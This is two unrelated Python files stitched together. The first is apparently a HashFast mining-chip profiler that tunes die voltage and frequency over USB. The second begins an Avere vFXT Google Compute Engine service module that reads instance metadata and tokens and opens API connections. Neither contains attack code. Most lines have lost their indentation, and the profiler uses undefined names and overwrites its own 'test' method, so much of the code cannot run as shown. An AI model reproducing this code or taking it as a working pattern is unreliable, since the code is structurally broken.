class HFProfilerBase(object):
def __init__(self):
pass
class HFProfilerInteractive(HFProfilerBase):
def __init__(self):
self.frequency = [None]*4
self.voltage = [None]*4
self.csvfilename = 'profiler_{}.csv'.format(int(time.time()))
with open(self.csvfilename, 'w') as csvfile:
csvwriter = csv.DictWriter(csvfile, fn, extrasaction='ignore')
csvwriter.writeheader()
def start(self, ui, dev):
        talkusb.talkusb(hf.INIT, None, 0)
self.test(ui, dev)
def test(self, ui, dev):
option = ui.prompt_int_single("Option? 0=PROM 1=DEFAULTS")
        if option == 1:
self.frequency = [FRQ_MIN]*4
self.voltage = [VLT_MIN]*4
while True:
try:
time.sleep(1)
# do settings for this round
self.set(ui)
# wait for settings to be applied
time.sleep(3)
# run test
self.run(ui, dev, option)
for x in range(4):
                    do = ui.prompt_int_single("Die {}? 0:SAME 1:VU 2:VD 3:FU 4:FD".format(x+1)) # VU/VD = voltage up/down, FU/FD = frequency up/down
                    if do == 1:
                        self.voltage[x] += VLT_STEP
                    elif do == 2:
                        self.voltage[x] -= VLT_STEP
                    elif do == 3:
                        self.frequency[x] += FRQ_STEP
                    elif do == 4:
                        self.frequency[x] -= FRQ_STEP
else:
return 0
except KeyboardInterrupt:
ui.log("exiting")
ui.end()
return
except:
ui.log("Error")
def set(self, ui):
ui.prompt_show("Updating Die Settings")
talkusb.talkusb(hf.INIT, None, 0)
setter = settings.SettingsRoutine(talkusb.talkusb, 1, ui.log)
for x in range(4):
frq = self.frequency[x]
vlt = self.voltage[x]
if frq is None or vlt is None:
return None
else:
setter.setup(x, frq, vlt)
# run
rslt = True
while rslt:
rslt = setter.one_cycle()
# wait for settings to be applied
time.sleep(3)
def vset(self, ui, dev):
for x in range(4):
vlt = self.voltage[x]
dev.voltage_set(0, x, vlt)
time.sleep(0.1)
def run(self, ui, dev, option):
talkusb.talkusb(hf.INIT, None, 0)
self.test = thermal.ThermalRoutine(talkusb.talkusb, 1, ui.log, deterministic=True)
ui.prompt_show("Running option "+str(option)+". Press board 'RESET' or ctrl+c to end.")
self.cr = ui.current_round
self.cr.clockrate = option
rslt = True
# thread
        thread = threading.Thread(target=self.monitor_temp, args=(ui,)) # args must be a tuple, not a set
self.running = True
#thread.daemon = True
thread.start()
# run
while rslt:
rslt = self.test.one_cycle()
if self.req_stop is True:
self.test.end()
rslt = False
# record current voltage and frequency
for x in range(4):
if self.test.dies[x] is not None:
die = self.test.dies[x]
if die['voltage'] is not None:
self.voltage[x] = die['voltage']
if die['frequency'] is not None:
self.frequency[x] = die['frequency']
# write logfile
with open(self.csvfilename, 'a') as csvfile:
csvwriter = csv.DictWriter(csvfile, fn, extrasaction='ignore')
for x in range(4):
if self.test.dies[x] is not None:
die = self.test.dies[x]
csvwriter.writerow(die)
#if rslt is -2:
# self.run(ui, dev, clockrate)
# cycle loop complete
#ui.prompt_enter("Round Complete. Check temperature.")
self.running = False
# wait for board to reset
time.sleep(3)
def monitor_temp(self, ui):
runtime = 0
self.req_stop = False
while self.running:
time.sleep(0.5)
runtime += 0.5
if runtime > 180: # three minutes
self.req_stop = True
self.cr.total_hashes = self.test.stats['hashes']
self.cr.total_errors = self.test.stats['lhw']
self.cr.hash_rate = self.test.stats['hashrate']
self.cr.stats = self.test.stats
if self.test.dies is not None:
for dinfo in ui.die_info:
if dinfo is not None:
die = self.test.dies[dinfo.index]
if die is not None:
dinfo.die = die
if self.voltage[dinfo.index] is not None:
die['voltage'] = self.voltage[dinfo.index]
dinfo.thermal_cutoff = die['thermal_cutoff']
dinfo.active = die['active']
dinfo.pending = die['pending']
dinfo.temp = die['temperature']
dinfo.vm = die['core_voltage']
def input(self, msg):
pass
class HFProfilerUI(BaseUI):
def setup_ui(self):
# column 0
self.setup_log( 0, 0, w=4)
# column 4
self.setup_logo( 4, 1, "HashFast Profiling Tool", "v0.1")
self.setup_input( 4, 8 )
self.setup_output( 4, 12)
self.setup_expmodule( 4, 16, coremap=0)
self.setup_stats( 4, 42)
# column 9
self.setup_info( 9, 1 )
def update_ui(self):
self.update_module()
self.update_expmodule()
self.update_info()
self.update_current()
def refresh_ui(self):
pass
def main(args):
ui = HFProfilerUI()
try:
ui.setup()
ui.refresh()
ui.prompt_show("Please connect device.")
dev = usbctrl.poll_hf_ctrl_device(printer=ui.log)
ret = ui.prompt("HashFast Profiling Tool. Press 's' to start", "s")
if ret:
profiler = HFProfilerInteractive()
profiler.start(ui, dev)
finally:
ui.end()
if __name__ == "__main__":
main(args)
|
gce.py
|
# Copyright (c) 2015-2020 Avere Systems, Inc. All Rights Reserved.
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root for license information.
''' Abstraction for doing things on instances via Google Compute
Cookbook/examples:
# With JSON key file provided by Google service account
gce = vFXT.gce.Service(network, zone, key_file=path_to_json)
# or with a P12 key file provided by Google service account
gce = vFXT.gce.Service(network, zone, client_email, project, key_file=path_to_p12)
# or if on a GCE compute instance, we can autodetect service account and settings
gce = vFXT.gce.Service.on_instance_init()
# Connection factory, has a thread specific copy
connection = gce.connection()
compute_conn = gce.connection(connection_type='compute')
storage_conn = gce.connection(connection_type='storage')
instances = gce.find_instances('') # filter string
instances = gce.get_instances([])
instance = gce.get_instance('instance id')
gce.start(instance)
gce.stop(instance)
gce.restart(instance)
gce.destroy(instance)
gce.shelve(instance)
gce.unshelve(instance)
instance = gce.refresh(instance)
print(gce.name(instance))
print(gce.ip(instance))
print(gce.fqdn(instance))
print(gce.status(instance))
if gce.is_on(instance): pass
if gce.is_off(instance): pass
if gce.is_shelved(instance): pass
gce.wait_for_status(instance, gce.ON_STATUS, retries=gce.WAIT_FOR_STATUS)
gce.create_instance(machine_type, name, boot_disk_image, other_disks=None, **options)
gce.create_cluster(self, cluster, **options)
gce.create_bucket(name)
gce.delete_bucket(name)
gce.load_cluster_information(cluster)
ip_count = 12
ip_addresses, mask = gce.get_available_addresses(count=ip_count, contiguous=True)
gce.get_dns_servers()
gce.get_ntp_servers()
gce.get_default_router()
serializeme = gce.export()
newgce = vFXT.gce.Service(**serializeme)
'''
import base64
from builtins import range #pylint: disable=redefined-builtin
from future.utils import viewitems, raise_from
import http.client
import httplib2
import httplib2.socks
import ssl
import logging
import time
import threading
import queue as Queue
import json
import socket
import re
import os
import uuid
import filecmp
from itertools import cycle
import pkg_resources
import googleapiclient.discovery
import oauth2client.client #pylint: disable=unused-import
import googleapiclient
logging.getLogger('googleapiclient').setLevel(logging.CRITICAL)
from vFXT.cidr import Cidr
from vFXT.serviceInstance import ServiceInstance
from vFXT.service import vFXTServiceTimeout, vFXTServiceConnectionFailure, vFXTServiceFailure, vFXTServiceMetaDataFailure, vFXTConfigurationException, vFXTCreateFailure, vFXTNodeExistsException, ShelveErrors, ServiceBase, backoff, load_defaults, CONNECTION_TIMEOUT
log = logging.getLogger(__name__)
class Service(ServiceBase):
'''GCE Service backend'''
ON_STATUS = "RUNNING"
OFF_STATUS = "TERMINATED"
NTP_SERVERS = ['169.254.169.254']
DNS_SERVERS = ['169.254.169.254']
GCE_URL = "https://www.googleapis.com/compute/v1/projects"
GCE_INSTANCE_HOST = '169.254.169.254'
CONTROL_ADDR = None
MACHINE_DEFAULTS = {
'f1-micro': {'data_disk_size': 200, 'data_disk_type': 'pd-standard', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-standard'},
'g1-small': {'data_disk_size': 200, 'data_disk_type': 'pd-standard', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-standard'},
'n1-highcpu-2': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-ssd'},
'n1-highcpu-4': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highcpu-8': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highcpu-16': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highcpu-32': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highcpu-64': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highcpu-96': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-2': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-ssd'},
'n1-highmem-4': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-8': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-16': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-32': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-64': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-highmem-96': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-1': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-ssd'},
'n1-standard-2': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 1, 'root_disk_type': 'pd-ssd'},
'n1-standard-4': {'data_disk_size': 200, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-8': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-16': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-32': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-64': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'n1-standard-96': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
'custom-6-40960': {'data_disk_size': 250, 'data_disk_type': 'pd-ssd', 'data_disk_count': 1, 'node_count': 3, 'root_disk_type': 'pd-ssd'},
}
MACHINE_TYPES = list(MACHINE_DEFAULTS.keys())
DEFAULTS_URL = "https://storage.googleapis.com/avere-dist/vfxtdefaults.json"
DEFAULT_SCOPES = ['https://www.googleapis.com/auth/compute',
'https://www.googleapis.com/auth/devstorage.full_control',
'https://www.googleapis.com/auth/userinfo.email']
S3TYPE_NAME = 'GOOGLE'
COREFILER_TYPE = 's3'
COREFILER_CRED_TYPE = 's3'
INSTANCENAME_RE = re.compile(r'[a-z]([-a-z0-9]*[a-z0-9])?$')
GSURL_RE = re.compile(r'gs://([^\/]*)/(.*)$')
STORAGE_CLASSES = ['STANDARD', 'NEARLINE', 'DURABLE_REDUCED_AVAILABILITY', 'MULTI_REGIONAL', 'REGIONAL', 'COLDLINE']
ENDPOINT_TEST_HOSTS = ['www.googleapis.com']
DISABLE_SSL_CERTIFICATE_VALIDATION = False
OFFLINE_DEFAULTS = {
'version': '1',
'clustermanager': {
'maxNumNodes': 20,
'instanceTypes': ['n1-highmem-8', 'n1-highmem-32'],
'cacheSizes': [
{'label': '250-persistent-SSD', 'size': 250, 'type': 'pd-ssd'},
{'label': '375-local-SSD', 'size': 375, 'type': 'local-ssd'},
{'label': '1000-persistent-SSD', 'size': 1000, 'type': 'pd-ssd'},
{'label': '1500-local-SSD', 'size': 1500, 'type': 'local-ssd'},
{'label': '3000-local-SSD', 'size': 3000, 'type': 'local-ssd'},
{'label': '4000-persistent-SSD', 'size': 4000, 'type': 'pd-ssd'},
{'label': '8000-persistent-SSD', 'size': 8000, 'type': 'pd-ssd'}
]
}
}
DEFAULT_CLUSTER_NETWORK_RANGE = '172.16.0.0/12'
ALLOCATE_INSTANCE_ADDRESSES = True
def __init__(self, network_id, zone, client_email=None, project_id=None,
key_file=None, key_data=None, access_token=None, s3_access_key=None,
s3_secret_access_key=None, private_range=None, proxy_uri=None,
no_connection_test=False, subnetwork_id=None, on_instance=False,
use_environment_for_auth=False, skip_load_defaults=False,
network_project_id=None, source_address=None):
'''Constructor
This performs an initial connection test and downloads the default
data.
Either a base64 encoded key string or the path to the service account
P12/JSON key file must be provided.
If the JSON key file is provided, client_email, project_id, and key are
read from it. Otherwise client_email and project_id must be specified.
If an access token is provided, that will be used in place of the
client_email + key/key_file. This is only useful if running on a
GCE instance.
Arguments:
network_id (str): network ID
zone (str or []): one or more zones names
client_email (str, optional): client email
project_id (str, optional): project ID
key_file (str, optional): file path to P12/JSON key file
access_token (str, optional): existing access token
private_range (str, optional): private address range (cidr)
subnetwork_id (str, optional): subnetwork ID
proxy_uri (str, optional): URI of proxy resource (e.g. http://user:pass@172.16.16.20:8080)
no_connection_test (bool, optional): skip connection test
skip_load_defaults (bool, optional): do not fetch defaults
network_project_id (str, optional): Project ID that owns the network (if outside current project)
'''
super(Service, self).__init__()
self.client_email = client_email
self.key_file = key_file
self.key_data = key_data
self.access_token = access_token
self.project_id = project_id
self.zones = zone if isinstance(zone, list) else [zone]
self.network_id = network_id
self.network_project_id = network_project_id
self.s3_access_key = s3_access_key
self.s3_secret_access_key = s3_secret_access_key
self.private_range = private_range
self.subnetwork_id = subnetwork_id
self.proxy_uri = proxy_uri
self.on_instance = on_instance
self.use_environment_for_auth = use_environment_for_auth
self.source_address = source_address
if not any([key_file, key_data, access_token, use_environment_for_auth]):
raise vFXTConfigurationException("You must provide a keyfile or auth token")
if self.key_data:
try:
self.client_email = self.key_data['client_email']
self.project_id = self.key_data['project_id']
except KeyError:
raise vFXTConfigurationException("Invalid key data: {}".format(self.key_data))
elif self.key_file and self.key_file.endswith('.json'):
with open(self.key_file) as f:
log.debug("Reading key data from {}".format(self.key_file))
key_data = f.read()
self.key_data = json.loads(key_data)
try:
self.client_email = self.key_data['client_email']
self.project_id = self.key_data['project_id']
except KeyError:
raise vFXTConfigurationException("Invalid key file: {}".format(self.key_file))
if not use_environment_for_auth:
if not all([self.client_email, self.project_id]):
raise vFXTConfigurationException("You must provide a keyfile or specify client_email and project_id")
# emit third party library version information
log.debug("Using googleapiclient version %s", pkg_resources.get_distribution("google-api-python-client").version)
log.debug("Using oauth2client version %s", pkg_resources.get_distribution("oauth2client").version)
if self.proxy_uri:
self.set_proxy(self.proxy_uri)
# check if we have a Xpn host project
try:
self.network_project_id = self.network_project_id or self._get_network_project()
except vFXTServiceTimeout as e:
raise_from(vFXTServiceConnectionFailure(e), e)
if not no_connection_test:
self.connection_test()
if self.subnetwork_id:
subnetwork_names = [_['name'] for _ in self._get_subnetworks()]
if self.subnetwork_id not in subnetwork_names:
err = "Invalid subnetwork: {} (available {})".format(self.subnetwork_id, ','.join(subnetwork_names))
raise vFXTConfigurationException(err)
if not skip_load_defaults:
log.debug("Fetching defaults from {}".format(self.DEFAULTS_URL))
load_defaults(self)
@classmethod
def get_instance_data(cls, source_address=None):
'''Detect the instance data
Arguments:
source_address (str, optional): source address for data request
This only works when running on a GCE instance.
Returns a service specific data structure. Well known keys that can be
expected across services:
machine_type (str): machine/instance type
account_id (str): account identifier
service_id (str): unique identifier for this host
ssh_keys ([str]): ssh keys
cluster_cfg (str): cluster configuration
https://cloud.google.com/compute/docs/metadata
'''
if source_address:
source_address = (source_address, 0)
connection_host = cls.GCE_INSTANCE_HOST
connection_port = http.client.HTTP_PORT
conn = http.client.HTTPConnection(connection_host, connection_port, source_address=source_address, timeout=CONNECTION_TIMEOUT)
instance_data = {}
headers = {'Metadata-Flavor': 'Google'}
attrs = {
'project-id': '/computeMetadata/v1/project/project-id',
'numeric-project-id': '/computeMetadata/v1/project/numeric-project-id',
'zone-id': '/computeMetadata/v1/instance/zone',
'network-id': '/computeMetadata/v1/instance/network-interfaces/0/network',
'ip': '/computeMetadata/v1/instance/network-interfaces/0/ip',
'access-token': '/computeMetadata/v1/instance/service-accounts/default/token',
'scopes': '/computeMetadata/v1/instance/service-accounts/default/scopes',
'email': '/computeMetadata/v1/instance/service-accounts/default/email',
'hostname': '/computeMetadata/v1/instance/hostname',
'tags': '/computeMetadata/v1/instance/tags',
'id': '/computeMetadata/v1/instance/id',
'machine-type': '/computeMetadata/v1/instance/machine-type',
'metadata_keys': '/computeMetadata/v1/instance/attributes/', # gives list b/c of trailing /
}
try:
for k, v in viewitems(attrs):
conn.request('GET', '{}'.format(v), headers=headers)
response = conn.getresponse()
if response.status == 200:
content = response.read().decode()
try:
instance_data[k] = json.loads(content)
except ValueError as e:
instance_data[k] = content
instance_data['metadata'] = {}
for key in [_ for _ in instance_data['metadata_keys'].split('\n') if _]: # filter empty entries
path = '{}{}'.format(attrs['metadata_keys'], key)
conn.request('GET', '{}'.format(path), headers=headers)
response = conn.getresponse()
if response.status == 200:
content = response.read().decode()
try:
instance_data['metadata'][key] = json.loads(content)
except ValueError as e:
instance_data['metadata'][key] = content
if 'access-token' in instance_data:
instance_data['access_token'] = instance_data['access-token']['access_token']
instance_data['expires_in'] = instance_data['access-token']['expires_in']
instance_data['token_expires'] = int(time.time()) + instance_data['expires_in'] - 120
else: # try and support cloud shell
# XXX right now this doesn't work... missing proper network-id (sets to default)
try:
s = socket.socket()
s.connect(('localhost', int(os.getenv('DEVSHELL_CLIENT_PORT', '0'))))
s.sendall('2\n[]'.encode())
data = json.loads(s.recv(1024).decode().split('\n')[1])
instance_data['email'] = data[0]
instance_data['project-id'] = data[1]
instance_data['access_token'] = data[2]
instance_data['token_expires'] = int(data[3]) - 120
except Exception as e:
log.error('Failed to extract configuration for cloud shell: {}'.format(e))
raise
instance_data['machine_type'] = instance_data['machine-type'].split('/')[-1]
instance_data['account_id'] = instance_data['numeric-project-id']
instance_data['service_id'] = instance_data['hostname'].split('.')[0]
instance_data['ssh_keys'] = []
if 'sshKeys' in instance_data['metadata']: # deprecated
# prune username: from the key data
instance_data['ssh_keys'] = [_.split(':')[-1] for _ in instance_data['metadata']['sshKeys'].split('\n')]
if 'ssh-keys' in instance_data['metadata']:
# prune username: from the key data
instance_data['ssh_keys'].extend([_.split(':')[-1] for _ in instance_data['metadata']['ssh-keys'].split('\n')])
if 'cluster_cfg' not in instance_data['metadata']:
instance_data['cluster_cfg'] = ''
else:
instance_data['cluster_cfg'] = instance_data['metadata']['cluster_cfg'].replace('\\n', '\n').replace(' ', '\n').replace('_', '\n').replace('@', '=')
instance_data['cluster_cfg'] = base64.b64decode(instance_data['cluster_cfg'].encode('utf-8')).decode()
except Exception as e:
raise_from(vFXTServiceMetaDataFailure('Unable to read instance metadata: {}'.format(e)), e)
finally:
conn.close()
return instance_data
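# Illustrative (hypothetical values) shape of selected keys returned by
# get_instance_data():
#   {'project-id': 'my-project', 'machine_type': 'n1-highmem-8',
#    'service_id': 'node-1', 'access_token': '...', 'ssh_keys': [...],
#    'cluster_cfg': ''}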
@classmethod
def environment_init(cls, **kwargs):
'''Init a GCE service object using the local environment credentials
Arguments:
**kwargs: arguments passed through to __init__
'''
kwargs['use_environment_for_auth'] = True
return Service(**kwargs)
@classmethod
def on_instance_init(cls, source_address=None, no_connection_test=False, proxy_uri=None, **kwargs): #pylint: disable=arguments-differ
'''Init a GCE service object from instance metadata
Arguments:
source_address (str, optional): source address for data request
no_connection_test (bool, optional): skip connection tests, defaults to False
proxy_uri (str, optional): URI of proxy resource
skip_load_defaults (bool, optional): do not fetch defaults
This is only meant to be called on a GCE instance; otherwise it will
raise a vFXTConfigurationException.
'''
instance_data = cls.get_instance_data(source_address=source_address)
log.debug('Read instance data: {}'.format(instance_data))
if source_address:
Service.CONTROL_ADDR = source_address
class HTTPSConnectionFromSource(httplib2.HTTPSConnectionWithTimeout):
"""
An override of httplib2's HTTPSConnectionWithTimeout that forces
connections to come from Service.CONTROL_ADDR. __init__ is essentially
a copy of the httplib2 version.
"""
def __init__(self, host, port=None, key_file=None, cert_file=None, #pylint: disable=unused-argument
strict=None, timeout=None, proxy_info=None, #pylint: disable=unused-argument
ca_certs=None, disable_ssl_certificate_validation=False, **other_kwargs):
log.debug("Making connection to {} from {}".format(host, Service.CONTROL_ADDR))
http.client.HTTPSConnection.__init__(self, host, port=port,
key_file=key_file,
cert_file=cert_file, timeout=timeout,
source_address=(Service.CONTROL_ADDR, 0))
self.timeout = timeout
self.proxy_info = proxy_info
if ca_certs is None:
ca_certs = httplib2.CA_CERTS
self.ca_certs = ca_certs
self.disable_ssl_certificate_validation = disable_ssl_certificate_validation
def connect(self):
"Connect to a host on a given (SSL) port."
if self.proxy_info and self.proxy_info.isgood():
sock = httplib2.socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
sock.setproxy(self.proxy_info.proxy_type, self.proxy_info.proxy_host, self.proxy_info.proxy_port, self.proxy_info.proxy_rdns, self.proxy_info.proxy_user, self.proxy_info.proxy_pass)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if self.source_address:
sock.bind(self.source_address)
if self.timeout:
sock.settimeout(float(self.timeout))
sock.connect((self.host, self.port))
# XXX set ssl_version in ssl.wrap_socket call
self.sock = ssl.wrap_socket(sock, keyfile=self.key_file, certfile=self.cert_file)
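# Register the source-bound connection class globally so that httplib2
# (used by the Google API client) makes its HTTPS connections from
# Service.CONTROL_ADDR.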
httplib2.SCHEME_TO_CONNECTION['https'] = HTTPSConnectionFromSource
# check scopes for one of the following
required_scopes = ['https://www.googleapis.com/auth/compute', 'https://www.googleapis.com/auth/cloud-platform']
if not any([_ in required_scopes for _ in instance_data['scopes'].split('\n')]):
raise vFXTConfigurationException("Compute R/W or Full Access required for this instance")
try:
project_id = instance_data['project-id']
zone_id = instance_data['zone-id'].split('/')[-1]
network_id = instance_data['network-id'].split('/')[-1]
network_project_id = instance_data['network-id'].split('/')[1]
access_token = instance_data['access_token']
client_email = instance_data['email']
srv = Service(network_id=network_id, client_email=client_email,
project_id=project_id, zone=zone_id,
access_token=access_token, no_connection_test=no_connection_test,
proxy_uri=proxy_uri, on_instance=True, skip_load_defaults=kwargs.get('skip_load_defaults'),
network_project_id=network_project_id, source_address=source_address)
srv.local.instance_data = instance_data
region = srv._zone_to_region(zone_id)
# translate our network project id into a name
srv.network_project_id = srv._get_network()['selfLink'].split('/')[-4]
# no subnetwork in metadata... figure out which subnetwork owns our address
subnetworks = srv._get_subnetworks(region)
if subnetworks:
for subnetwork in subnetworks:
if Cidr(subnetwork['ipCidrRange']).contains(instance_data['ip']):
srv.subnetwork_id = subnetwork['name']
if not srv.subnetwork_id:
srv.subnetwork_id = subnetworks[0]['name']
return srv
except (vFXTServiceFailure, vFXTServiceConnectionFailure) as e:
raise
except Exception as e:
raise_from(vFXTConfigurationException(e), e)
def connection_test(self):
'''Connection test
Raises: vFXTConfigurationException
'''
log.debug("Performing connection test")
try:
if not self.proxy: # proxy environments may block outgoing name resolution
self.dns_check()
conn = self.connection(retries=0)
resp = conn.projects().get(project=self.project_id).execute()
for q in resp['quotas']:
if q['limit'] and float(q['usage']) / q['limit'] > 0.9:
log.warning("QUOTA ALERT: Using {} of {} {}".format(int(q['usage']), int(q['limit']), q['metric']))
except Exception as e:
if isinstance(e, IOError):
log.exception(e)
raise_from(vFXTServiceConnectionFailure("Failed to establish connection to service: {}".format(e)), e)
def check(self, percentage=0.6, instances=0, machine_type=None, data_disk_type=None, data_disk_size=None, data_disk_count=None): #pylint: disable=arguments-differ
'''Check quotas and API access
Arguments:
percentage (float, optional): percentage as a decimal
instances (int, optional): Number of planned instances to account for
machine_type (str, optional): Machine type
data_disk_type (str, optional): Data disk type
data_disk_size (int, optional): Data disk size
data_disk_count (int, optional): Data disk count
'''
core_count = 0
if machine_type and instances:
machine_type_cores = 1
try:
if machine_type.startswith('custom-'):
machine_type_cores = int(machine_type.split('-')[-2])
else:
machine_type_cores = int(machine_type.split('-')[-1])
except ValueError: pass
core_count = instances * machine_type_cores
ssd_count = 0
local_ssd_count = 0
if all([data_disk_type, data_disk_count, data_disk_size]):
if data_disk_type == 'local-ssd':
local_ssd_count = data_disk_count * data_disk_size
else:
ssd_count = data_disk_count * data_disk_size
conn = self.connection()
project_quotas = conn.projects().get(project=self.project_id).execute()['quotas']
for q in project_quotas:
usage = int(q.get('usage') or 0)
limit = int(q.get('limit') or 0)
metric = q.get('metric')
if not metric:
log.error(q)
continue
metric = metric.lower().capitalize().replace('_', ' ')
if limit and float(usage) / limit > percentage:
log.warning("QUOTA ALERT: Using {} of {} {} for the project".format(usage, limit, metric))
else:
log.debug("Using {} of {} {} for the project".format(usage, limit, metric))
region = self._zone_to_region(self.zones[0])
region_quotas = conn.regions().get(project=self.project_id, region=region).execute()['quotas']
for q in region_quotas:
usage = int(q.get('usage') or 0)
limit = int(q.get('limit') or 0)
metric = q.get('metric')
if not metric:
continue
if metric == 'CPUS':
usage += core_count
if metric == 'SSD_TOTAL_GB':
usage += ssd_count
if metric == 'LOCAL_SSD_TOTAL_GB':
usage += local_ssd_count
metric = metric.lower().capitalize().replace('_', ' ')
if limit and float(usage) / limit > percentage:
log.warning("QUOTA ALERT: Using {} of {} {} for the region".format(usage, limit, metric))
else:
log.debug("Using {} of {} {} for the region".format(usage, limit, metric))
def _auth_http(self, scopes=None):
'''Simple wrapper for the HTTP object credential authorization
Do not call this directly, use connection() instead.
Arguments:
scopes ([str], optional): list of scopes to request, defaults to DEFAULT_SCOPES
'''
creds = None
scopes = scopes or self.DEFAULT_SCOPES
if self.access_token:
from oauth2client.client import AccessTokenCredentials
# we check for access_token presence but use the threading.local copy
creds = AccessTokenCredentials(self.local.access_token, 'vFXT UserAgent/0.1')
elif self.use_environment_for_auth:
creds = oauth2client.client.GoogleCredentials.get_application_default()
else:
try:
from oauth2client.service_account import ServiceAccountCredentials
if self.key_data:
creds = ServiceAccountCredentials.from_json_keyfile_dict(self.key_data, scopes)
elif self.key_file.endswith('.p12'):
creds = ServiceAccountCredentials.from_p12_keyfile(self.client_email, self.key_file, scopes)
else:
raise vFXTConfigurationException("Unknown key file type: {}".format(self.key_file))
except Exception as e:
log.debug('Failed importing oauth2client.service_account (oauth2client 2.x), falling back to oauth2client 1.x: {}'.format(e))
with open(self.key_file) as f:
key = f.read()
if self.key_file.endswith('.json'):
key = json.loads(key)['private_key']
from oauth2client.client import SignedJwtAssertionCredentials
creds = SignedJwtAssertionCredentials(self.client_email, key, scopes)
proxy = None
if self.proxy_uri:
proxy = httplib2.proxy_info_from_url(self.proxy_uri)
else:
try:
proxy = httplib2.proxy_info_from_environment()
except Exception as e:
log.debug("httplib2.proxy_info_from_environment(): {}".format(e))
# maybe set this for those proxies that don't support CONNECT?
# proxy.proxy_type = httplib2.socks.PROXY_TYPE_HTTP_NO_TUNNEL
http_transport = httplib2.Http(proxy_info=proxy,
disable_ssl_certificate_validation=self.DISABLE_SSL_CERTIFICATE_VALIDATION, timeout=CONNECTION_TIMEOUT)
return creds.authorize(http_transport)
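# _auth_http() returns an httplib2.Http transport with the credentials
# applied; connection() below caches one client per connection type/version
# in thread-local storage.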
def connection(self, connection_type='compute', version='v1', retries=CONNECTION_TIMEOUT, scopes=None): #pylint: disable=arguments-differ
'''Connection factory, returns a new connection or thread local copy
Arguments:
connection_type (str, optional): connection type (compute, storage)
version (str, optional): API version, defaults to v1
retries (int, optional): number of retries, defaults to vFXT.service.CONNECTION_TIMEOUT
scopes ([str], optional): list of scopes to request, defaults to DEFAULT_SCOPES
'''
try:
if self.local.instance_data['token_expires'] < int(time.time()):
log.debug("Access token expired, forcing refresh")
self.local.connections = {}
except Exception:
pass
if not hasattr(self.local, 'connections'):
self.local.connections = {}
connection_sig = '{}_{}'.format(connection_type, version)
if not self.local.connections.get(connection_sig, False):
if self.access_token:
self.local.instance_data = self.get_instance_data(source_address=self.source_address)
self.local.access_token = self.local.instance_data['access_token']
log.debug("Creating new {} connection object".format(connection_type))
connection_attempts = 0
while True:
try:
self.local.connections[connection_sig] = googleapiclient.discovery.build(connection_type, version, http=self._auth_http(scopes=scopes))
break
except Exception as e:
if connection_attempts == retries:
raise_from(vFXTServiceConnectionFailure("Failed to establish connection to service: {}".format(e)), e)
log.debug("Retrying failed connection attempt: {}".format(e))
connection_attempts += 1
time.sleep(backoff(connection_attempts))
return self.local.connections[connection_sig]
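# Illustrative usage: the storage API client used elsewhere in this class is
# obtained the same way, e.g.
#   storage_service = self.connection(connection_type='storage')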
def find_instances(self, search=None, all_regions=True): #pylint: disable=arguments-differ
'''Returns all or filtered list of instances
Arguments:
search (str, optional): search query
all_regions (bool, optional): search all regions, not just the current
Search examples:
field [ne|eq] expression
'name eq instance-name'
'name eq (name1|name2|name3)'
'name eq prefix.*$'
'''
conn = self.connection()
instances = []
